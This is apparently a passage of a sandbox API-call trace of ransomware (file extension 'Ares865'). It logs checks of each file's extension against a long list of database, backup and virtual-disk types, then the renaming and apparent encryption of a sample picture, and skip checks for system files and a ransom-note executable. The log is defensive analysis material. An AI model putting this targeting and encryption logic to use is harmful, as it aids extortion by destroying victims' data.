lstrlenW (lpString="bak") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0046.046] lstrlenW (lpString="ba_") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0046.046] lstrlenW (lpString="dbb") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0046.046] lstrlenW (lpString="vmdk") returned 4 [0046.046] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0046.046] lstrlenW (lpString="rar") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0046.046] lstrlenW (lpString="zip") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0046.046] lstrlenW (lpString="tgz") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0046.046] lstrlenW (lpString="vbox") returned 4 [0046.046] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0046.046] lstrlenW (lpString="vdi") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0046.046] lstrlenW (lpString="vhd") returned 3 [0046.046] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0046.046] lstrlenW (lpString="vhdx") returned 4 [0046.046] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0046.046] lstrlenW (lpString="avhd") returned 4 [0046.046] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0046.046] lstrlenW (lpString="db") returned 2 [0046.046] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0046.047] lstrlenW (lpString="db2") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0046.047] lstrlenW (lpString="db3") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0046.047] lstrlenW (lpString="dbf") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0046.047] lstrlenW (lpString="mdf") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0046.047] lstrlenW (lpString="mdb") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0046.047] lstrlenW (lpString="sql") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0046.047] lstrlenW (lpString="sqlite") returned 6 [0046.047] lstrcmpiW (lpString1="la.jpg", lpString2="sqlite") returned -1 [0046.047] lstrlenW (lpString="sqlite3") returned 7 [0046.047] lstrcmpiW (lpString1="ala.jpg", lpString2="sqlite3") returned -1 [0046.047] lstrlenW (lpString="sqlitedb") returned 8 [0046.047] lstrcmpiW (lpString1="oala.jpg", lpString2="sqlitedb") returned -1 [0046.047] lstrlenW (lpString="xml") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0046.047] lstrlenW (lpString="$er") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0046.047] lstrlenW (lpString="4dd") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0046.047] lstrlenW (lpString="4dl") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0046.047] lstrlenW (lpString="^^^") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0046.047] lstrlenW (lpString="abs") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0046.047] lstrlenW (lpString="abx") returned 3 [0046.047] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0046.047] lstrlenW (lpString="accdb") returned 5 [0046.047] lstrcmpiW (lpString1="a.jpg", lpString2="accdb") returned -1 [0046.047] lstrlenW (lpString="accdc") returned 5 [0046.047] lstrcmpiW (lpString1="a.jpg", lpString2="accdc") returned -1 [0046.047] lstrlenW (lpString="accde") returned 5 [0046.048] lstrcmpiW (lpString1="a.jpg", lpString2="accde") returned -1 [0046.048] lstrlenW (lpString="accdr") returned 5 [0046.048] lstrcmpiW (lpString1="a.jpg", lpString2="accdr") returned -1 [0046.048] lstrlenW (lpString="accdt") returned 5 [0046.048] lstrcmpiW (lpString1="a.jpg", lpString2="accdt") returned -1 [0046.048] lstrlenW (lpString="accdw") returned 5 [0046.048] lstrcmpiW (lpString1="a.jpg", lpString2="accdw") returned -1 [0046.048] lstrlenW (lpString="accft") returned 5 [0046.048] lstrcmpiW (lpString1="a.jpg", lpString2="accft") returned -1 [0046.048] lstrlenW (lpString="adb") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.048] lstrlenW (lpString="adb") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.048] lstrlenW (lpString="ade") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0046.048] lstrlenW (lpString="adf") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0046.048] lstrlenW (lpString="adn") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0046.048] lstrlenW (lpString="adp") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0046.048] lstrlenW (lpString="alf") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0046.048] lstrlenW (lpString="ask") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0046.048] lstrlenW (lpString="btr") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0046.048] lstrlenW (lpString="cat") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0046.048] lstrlenW (lpString="cdb") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0046.048] lstrlenW (lpString="ckp") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0046.048] lstrlenW (lpString="cma") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0046.048] lstrlenW (lpString="cpd") returned 3 [0046.048] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0046.049] lstrlenW (lpString="dacpac") returned 6 [0046.049] lstrcmpiW (lpString1="la.jpg", lpString2="dacpac") returned 1 [0046.049] lstrlenW (lpString="dad") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0046.049] lstrlenW (lpString="dadiagrams") returned 10 [0046.049] lstrlenW (lpString="daschema") returned 8 [0046.049] lstrcmpiW (lpString1="oala.jpg", lpString2="daschema") returned 1 [0046.049] lstrlenW (lpString="db-journal") returned 10 [0046.049] lstrlenW (lpString="db-shm") returned 6 [0046.049] lstrcmpiW (lpString1="la.jpg", lpString2="db-shm") returned 1 [0046.049] lstrlenW (lpString="db-wal") returned 6 [0046.049] lstrcmpiW (lpString1="la.jpg", lpString2="db-wal") returned 1 [0046.049] lstrlenW (lpString="dbc") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0046.049] lstrlenW (lpString="dbs") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0046.049] lstrlenW (lpString="dbt") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0046.049] lstrlenW (lpString="dbv") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0046.049] lstrlenW (lpString="dbx") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0046.049] lstrlenW (lpString="dcb") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0046.049] lstrlenW (lpString="dct") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0046.049] lstrlenW (lpString="dcx") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0046.049] lstrlenW (lpString="ddl") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0046.049] lstrlenW (lpString="dlis") returned 4 [0046.049] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0046.049] lstrlenW (lpString="dp1") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0046.049] lstrlenW (lpString="dqy") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0046.049] lstrlenW (lpString="dsk") returned 3 [0046.049] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0046.050] lstrlenW (lpString="dsn") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0046.050] lstrlenW (lpString="dtsx") returned 4 [0046.050] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0046.050] lstrlenW (lpString="dxl") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0046.050] lstrlenW (lpString="eco") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0046.050] lstrlenW (lpString="ecx") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0046.050] lstrlenW (lpString="edb") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0046.050] lstrlenW (lpString="epim") returned 4 [0046.050] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0046.050] lstrlenW (lpString="fcd") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0046.050] lstrlenW (lpString="fdb") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0046.050] lstrlenW (lpString="fic") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0046.050] lstrlenW (lpString="flexolibrary") returned 12 [0046.050] lstrlenW (lpString="fm5") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0046.050] lstrlenW (lpString="fmp") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0046.050] lstrlenW (lpString="fmp12") returned 5 [0046.050] lstrcmpiW (lpString1="a.jpg", lpString2="fmp12") returned -1 [0046.050] lstrlenW (lpString="fmpsl") returned 5 [0046.050] lstrcmpiW (lpString1="a.jpg", lpString2="fmpsl") returned -1 [0046.050] lstrlenW (lpString="fol") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0046.050] lstrlenW (lpString="fp3") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0046.050] lstrlenW (lpString="fp4") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0046.050] lstrlenW (lpString="fp5") returned 3 [0046.050] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0046.051] lstrlenW (lpString="fp7") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0046.051] lstrlenW (lpString="fpt") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0046.051] lstrlenW (lpString="frm") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0046.051] lstrlenW (lpString="gdb") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.051] lstrlenW (lpString="gdb") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.051] lstrlenW (lpString="grdb") returned 4 [0046.051] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0046.051] lstrlenW (lpString="gwi") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0046.051] lstrlenW (lpString="hdb") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0046.051] lstrlenW (lpString="his") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0046.051] lstrlenW (lpString="ib") returned 2 [0046.051] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0046.051] lstrlenW (lpString="idb") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0046.051] lstrlenW (lpString="ihx") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0046.051] lstrlenW (lpString="itdb") returned 4 [0046.051] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0046.051] lstrlenW (lpString="itw") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0046.051] lstrlenW (lpString="jet") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0046.051] lstrlenW (lpString="jtx") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0046.051] lstrlenW (lpString="kdb") returned 3 [0046.051] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0046.051] lstrlenW (lpString="kexi") returned 4 [0046.051] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0046.051] lstrlenW (lpString="kexic") returned 5 [0046.052] lstrcmpiW (lpString1="a.jpg", lpString2="kexic") returned -1 [0046.052] lstrlenW (lpString="kexis") returned 5 [0046.052] lstrcmpiW (lpString1="a.jpg", lpString2="kexis") returned -1 [0046.052] lstrlenW (lpString="lgc") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0046.052] lstrlenW (lpString="lwx") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0046.052] lstrlenW (lpString="maf") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0046.052] lstrlenW (lpString="maq") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0046.052] lstrlenW (lpString="mar") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0046.052] lstrlenW (lpString="marshal") returned 7 [0046.052] lstrcmpiW (lpString1="ala.jpg", lpString2="marshal") returned -1 [0046.052] lstrlenW (lpString="mas") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0046.052] lstrlenW (lpString="mav") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0046.052] lstrlenW (lpString="maw") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0046.052] lstrlenW (lpString="mdbhtml") returned 7 [0046.052] lstrcmpiW (lpString1="ala.jpg", lpString2="mdbhtml") returned -1 [0046.052] lstrlenW (lpString="mdn") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0046.052] lstrlenW (lpString="mdt") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0046.052] lstrlenW (lpString="mfd") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0046.052] lstrlenW (lpString="mpd") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0046.052] lstrlenW (lpString="mrg") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0046.052] lstrlenW (lpString="mud") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0046.052] lstrlenW (lpString="mwb") returned 3 [0046.052] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0046.052] lstrlenW (lpString="myd") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0046.053] lstrlenW (lpString="ndf") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0046.053] lstrlenW (lpString="nnt") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0046.053] lstrlenW (lpString="nrmlib") returned 6 [0046.053] lstrcmpiW (lpString1="la.jpg", lpString2="nrmlib") returned -1 [0046.053] lstrlenW (lpString="ns2") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0046.053] lstrlenW (lpString="ns3") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0046.053] lstrlenW (lpString="ns4") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0046.053] lstrlenW (lpString="nsf") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0046.053] lstrlenW (lpString="nv") returned 2 [0046.053] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0046.053] lstrlenW (lpString="nv2") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0046.053] lstrlenW (lpString="nwdb") returned 4 [0046.053] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0046.053] lstrlenW (lpString="nyf") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0046.053] lstrlenW (lpString="odb") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.053] lstrlenW (lpString="odb") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.053] lstrlenW (lpString="oqy") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0046.053] lstrlenW (lpString="ora") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0046.053] lstrlenW (lpString="orx") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0046.053] lstrlenW (lpString="owc") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0046.053] lstrlenW (lpString="p96") returned 3 [0046.053] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0046.054] lstrlenW (lpString="p97") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0046.054] lstrlenW (lpString="pan") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0046.054] lstrlenW (lpString="pdb") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0046.054] lstrlenW (lpString="pdm") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0046.054] lstrlenW (lpString="pnz") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0046.054] lstrlenW (lpString="qry") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0046.054] lstrlenW (lpString="qvd") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0046.054] lstrlenW (lpString="rbf") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0046.054] lstrlenW (lpString="rctd") returned 4 [0046.054] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0046.054] lstrlenW (lpString="rod") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0046.054] lstrlenW (lpString="rodx") returned 4 [0046.054] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0046.054] lstrlenW (lpString="rpd") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0046.054] lstrlenW (lpString="rsd") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0046.054] lstrlenW (lpString="sas7bdat") returned 8 [0046.054] lstrcmpiW (lpString1="oala.jpg", lpString2="sas7bdat") returned -1 [0046.054] lstrlenW (lpString="sbf") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0046.054] lstrlenW (lpString="scx") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0046.054] lstrlenW (lpString="sdb") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0046.054] lstrlenW (lpString="sdc") returned 3 [0046.054] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0046.054] lstrlenW (lpString="sdf") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0046.055] lstrlenW (lpString="sis") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0046.055] lstrlenW (lpString="spq") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0046.055] lstrlenW (lpString="te") returned 2 [0046.055] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0046.055] lstrlenW (lpString="teacher") returned 7 [0046.055] lstrcmpiW (lpString1="ala.jpg", lpString2="teacher") returned -1 [0046.055] lstrlenW (lpString="tmd") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0046.055] lstrlenW (lpString="tps") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0046.055] lstrlenW (lpString="trc") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.055] lstrlenW (lpString="trc") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.055] lstrlenW (lpString="trm") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0046.055] lstrlenW (lpString="udb") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0046.055] lstrlenW (lpString="udl") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0046.055] lstrlenW (lpString="usr") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0046.055] lstrlenW (lpString="v12") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0046.055] lstrlenW (lpString="vis") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0046.055] lstrlenW (lpString="vpd") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0046.055] lstrlenW (lpString="vvv") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0046.055] lstrlenW (lpString="wdb") returned 3 [0046.055] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0046.055] lstrlenW (lpString="wmdb") returned 4 [0046.055] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0046.055] lstrlenW (lpString="wrk") returned 3 [0046.056] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0046.056] lstrlenW (lpString="xdb") returned 3 [0046.056] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0046.056] lstrlenW (lpString="xld") returned 3 [0046.056] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0046.056] lstrlenW (lpString="xmlff") returned 5 [0046.056] lstrcmpiW (lpString1="a.jpg", lpString2="xmlff") returned -1 [0046.056] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.Ares865") returned 58 [0046.056] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.ares865"), dwFlags=0x1) returned 1 [0046.056] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x168 [0046.056] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=780831) returned 1 [0046.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0046.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0046.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0046.057] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0046.058] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0046.058] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0046.058] CreateFileMappingW (hFile=0x168, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbed20, lpName=0x0) returned 0x118 [0046.061] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbed20) returned 0x1120000 [0046.386] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0046.386] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0046.386] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0046.386] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb18 [0046.386] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb18 | out: hHeap=0x2b0000) returned 1 [0046.386] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e2710 [0046.386] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0046.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0046.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0046.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cb310 [0046.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0046.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0046.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0046.387] UnmapViewOfFile (lpBaseAddress=0x1120000) returned 1 [0046.443] CloseHandle (hObject=0x118) returned 1 [0046.443] CloseHandle (hObject=0x168) returned 1 [0046.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0046.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0046.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0046.455] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="aoldtz.exe") returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".") returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="..") returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="windows") returned -1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="bootmgr") returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="temp") returned -1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="pagefile.sys") returned -1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="boot") returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="ids.txt") returned 1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="ntuser.dat") returned -1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="perflogs") returned -1 [0046.455] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="MSBuild") returned -1 [0046.455] 